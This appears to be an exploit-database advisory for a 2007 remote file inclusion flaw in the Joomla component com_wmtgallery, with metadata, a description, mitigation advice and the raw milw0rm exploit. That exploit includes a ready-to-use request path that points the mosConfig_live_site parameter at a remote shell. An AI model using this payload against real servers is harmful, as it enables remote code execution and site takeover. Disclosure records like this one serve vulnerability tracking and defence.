Joomla com_wmtgallery Remote File Include

vendor:

com_wmtgallery

by:

Unknown

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: com_wmtgallery

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla com_wmtgallery Remote File Include

This exploit allows remote attackers to include arbitrary files on a vulnerable Joomla component called com_wmtgallery. The vulnerability is caused by the insecure handling of the 'mosConfig_live_site' parameter in the 'admin.wmtgallery.php' file. By manipulating the 'mosConfig_live_site' parameter, an attacker can include a remote file and potentially execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, users should update their Joomla installation to the latest version and apply any patches or security updates provided by the Joomla project. Additionally, it is recommended to disable any unused or unnecessary Joomla components to reduce the attack surface.

Source

Exploit-DB raw data:

============================================
=                                          =
=             XORON  (c) 2007              =
=                                          =
============================================
=                                          =
=Joomla com_wmtgallery Remote File Include  
=                                          =
============================================
=
= Download:
=
= http://www.webmaster-tips.net
=
============================================
=
= Exploit:
= /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=shell?
=
============================================
=                                          =
=Tum islam aleminin ramazan bayrami mubarek olsn =
=                                          =
============================================ 

# milw0rm.com [2007-10-07]